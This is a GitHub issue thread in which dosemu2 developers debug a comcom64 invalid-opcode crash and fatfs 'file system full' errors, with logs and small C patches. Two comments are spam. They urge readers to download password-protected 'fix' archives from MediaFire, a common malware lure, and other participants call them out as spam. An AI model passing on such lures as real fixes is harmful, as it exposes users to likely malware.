### ISSUE TITLE
comcom 64 bit crashes with invalid opcode

### ISSUE THREAD

**Issue by severach** [dosemu2/comcom64#101]
**Describe the bug**
Starting DOSEMU with fdpp+comcom64 terminates DOSEMU after a quick window flash.

**Attach the log**
[boot.comcom64.2024-08-26.log.gz](https://github.com/user-attachments/files/16751573/boot.comcom64.2024-08-26.log.gz)

**A regression?**
Comcom 64 bit worked for a few weeks in March and April. Hasn't worked since then. I always install the latest git versions of djstub, dj64, and dosemu to check again.

**dosemu2 origins**
[dosemu2](https://aur.archlinux.org/packages/dosemu2-git) [fdpp](https://aur.archlinux.org/packages/fdpp) [comcom](https://aur.archlinux.org/packages/comcom32)

**Additional info**
The error we can see from `dosemu -t` and the log shows:

```
ERROR: SIGILL while in vm86(): c44d:002e
```

Leaving DOSEMU running with FreeCOM and running comcom 64 bit I can get the error I seen in April.

```
D:\ver
 
FreeCom version 0.84-pre2 XMS_Swap [Aug 28 2006 00:29:00]
D:\dir C:\COMMAND.COM
 Volume in drive C is OME CHRIS C
 
 Directory of C:\
 
COMMAND  COM       314,548  08-26-24 11:22a
         1 file(s)        314,548 bytes
         0 dir(s)    243,656 Mega bytes free
D:\>C:\command.com
 
Invalid Opcode at 002E 828F 3297 8281 0FFF 9026 6448 86A0 48B0 C064 D086 6448 86
E0
```

Comcom 32 bit and FreeCom are working fine. I added the 32 bit comcom compile back to the PKGBUILD.

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by stsp** [comment]
`ERROR: fatfs: file system full, /home/chris/c`
This likely means you are not loading emufs.sys,
or something along the lines. Your config is likely
too far from the default.

**Comment by stsp** [comment]
`ERROR: MFS: invalid path \run\media`
This is also interesting, how to reproduce?

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by stsp** [comment]
Damn, they are kidding: whole day of a
spam-blocking. github should really do
something about that.

**Comment by severach** [comment]
Not a very good spammer. MediaFire already deleted the first one and blocked the second, which is good. This is the first time I've seen automated github issue spam. Looks like gitlab has it too. I'm not sure those fixes would break my Linux.

File System Full has been showing up since long before #562. I just ignore it. From that issue large files do this and I have 64GB in 4 large files in C:\ which blocks emufs. I moved those out and now emufs loads. comcom terminates dosemu with the same error.

`/run/media` is to provide USB flash drive support. It shouldn't be invalid.

```
rem fdppconf.sys
rem config.sys for DOSEMU2 + FDPP
SWITCHES=#0
COUNTRY=#1
; early hook for external himem etc
CHAIN=@globhook.sys
DOS=UMB
dosdata=umb
fileshigh=128
lastdrive=Z
files=100
int0divz=off
device=d:\dosemu\umb.sys
; hook for EMM driver
CHAIN=@emmhook.sys
devicehigh=d:\dosemu\ems.sys
rem emufs.sys /all replaces emufs.com
devicehigh=d:\dosemu\emufs.sys /all
rem devicehigh=d:\dosemu\cdrom.sys
set SHELL_ALLOW_EXIT=1
shellhigh=#2 /M2
CHAIN=@%0\userhook.sys
install=d:\dosemu\lredir.com -f t: linux\fs\run\media
```

**Comment by stsp** [comment]
IIRC you now need to write
`/run/media`, while older dosemus were
understanding both types of slashes.

**Comment by stsp** [comment]
Could you please try this patch:
```
--- a/src/base/misc/fatfs.c
+++ b/src/base/misc/fatfs.c
@@ -1252,6 +1252,8 @@ static void _add_object(fatfs_t *f, unsigned parent, char *s, const char *name)
            f->obj[parent].name, f->obj[parent].size);
       warned++;
     }
+    if (parent == 0)
+      leavedos(20);
     goto err;
   }

```
It should exit if fatfs overflow happened
in a root dir, which is fatal.

**Comment by severach** [comment]
So the line is `install=d:\dosemu\lredir.com -f t: linux\fs/run/media`. Interesting combination of back and forward slashes.

I have 4 big files, 1GB, 1.5GB, 26GB, and 34GB. For starters you should skip files that are >2GB. Doesn't matter what they are, they aren't fitting in a real or emulated fatfs and aren't needed to boot. Then you should sort the dir by size and stop successfully when you hit 2GB. My first 1GB file would make it in for no reason but the remaining gig files would be skipped. You could just skip files that would exceed 2GB but this creates the strange case where I could fill it with a file 1.999999999999GB file and no more tiny files would fit.

```
==> Starting prepare()...
  -> Local Patch /home/chris/build/dosemu2-git//00000foo.localpatch
patching file src/base/misc/fatfs.c
Hunk #1 succeeded at 1252 with fuzz 1.
  -> Local Patch /home/chris/build/dosemu2-git//0000-custom-vga-mode-4f.localpatch
patching file src/base/dev/vga/vgaemu_modelist.h
Hunk #1 succeeded at 57 (offset 4 lines).
==> Starting pkgver()...
```

I put the files back into C. patch 0000foo applied and DOSEMU launched to a prompt.

```
ERROR: fatfs: file system full, /home/chris/c

dosemu XMS 3.0 & UMB support enabled
dosemu EMS driver rev 0.9 installed.
EMUFS host file and print access available
T: = \\linux\fs/run/media attrib = READ/WRITE
Process 0 starting: C:\command.com /e:2048 /k %FDPP_AUTOEXEC% /M2
```

It's not an error any more. Would be better to say:

```
WARNING: fatfs: file system full, skipped >2GB /home/chris/c/file26.foo 26GB
WARNING: fatfs: file system full, skipped >2GB /home/chris/c/file34.foo 34GB
WARNING: fatfs: file system made unnecessarily large by file /home/chris/c/file10.foo 1.0GB
WARNING: fatfs: file system full, skipped /home/chris/c/file15.foo 1.5GB
```

That makes it clear what the problem is, whether it matters, and how to fix it.

**Comment by stsp** [comment]
> So the line is install=d:\dosemu\lredir.com -f t: linux\fs/run/media. Interesting combination of back and forward slashes.

You can remove `linux\fs` prefix and then
nothing interesting left.

> I put the files back into C. patch 0000foo applied and DOSEMU launched to a prompt.

Thanks, Does this work any better?
```
--- a/src/base/misc/fatfs.c
+++ b/src/base/misc/fatfs.c
@@ -1451,6 +1451,8 @@ void assign_clusters(fatfs_t *f, unsigned max_clu, unsigned max_obj)
       f->got_all_objs = 1;
       fatfs_msg("assign_clusters: file system full\n");
       error("fatfs: file system full, %s\n", f->obj[0].name);
+      if (u == 0)
+        leavedos(20);
       /* remove dangling objects */
       for(k = u; k < f->objs; k++) {
         if(f->obj[k].name)
```

Of course sorting is already done, but it
doesn't help because when DOS looks for
some file in a root dir that doesn't exist, it
reads all dentries. And we can't make all
files available for boot (like userhook.sys
and alike).

> skip files that would exceed 2GB but this creates the strange case where I could fill it with a file

Exactly. And I don't think having such files
in a root dir of a boot drive, is the brightest
idea.

**Comment by stsp** [comment]
I think this should do it:
```
--- a/src/base/misc/fatfs.c
+++ b/src/base/misc/fatfs.c
@@ -1451,6 +1451,8 @@ void assign_clusters(fatfs_t *f, unsigned max_clu, unsigned max_obj)
       f->got_all_objs = 1;
       fatfs_msg("assign_clusters: file system full\n");
       error("fatfs: file system full, %s\n", f->obj[0].name);
+      if (f->obj[u].parent == 0)
+        leavedos(20);
       /* remove dangling objects */
       for(k = u; k < f->objs; k++) {
         if(f->obj[k].name)
```

**Comment by severach** [comment]
DOSEMU exits with the big files and runs with the big files moved away from C:\

**Comment by stsp** [comment]
Does comcom64 now work?

**Comment by severach** [comment]
No. Same errors. I already moved those big files out to make emufs load. Didn't help. You just made it so I can't ignore the error any more.

[boot.comcom64.2024-08-27.log.gz](https://github.com/user-attachments/files/16765816/boot.comcom64.2024-08-27.log.gz)

**Comment by stsp** [comment]
Can you set up an ssh for me?

**Comment by severach** [comment]
It needs to be updated. The MAX_FILE_NAME_LEN patch is gone. 2 of 4 parts of the 0001-stsp-dpstub-alloc-dpmi-mem-in-UMB.patch still apply. Is there an updated PR patch?

**Comment by stsp** [comment]
Please use the upstream version, not
my fork. This upstream is cooperative
enough to not fork anything.

**Comment by stsp** [comment]
(and no patches)

**Comment by severach** [comment]
I have everything rebuild on the test computer and the home computer. A new smallerc gets comcom64 bit to launch.
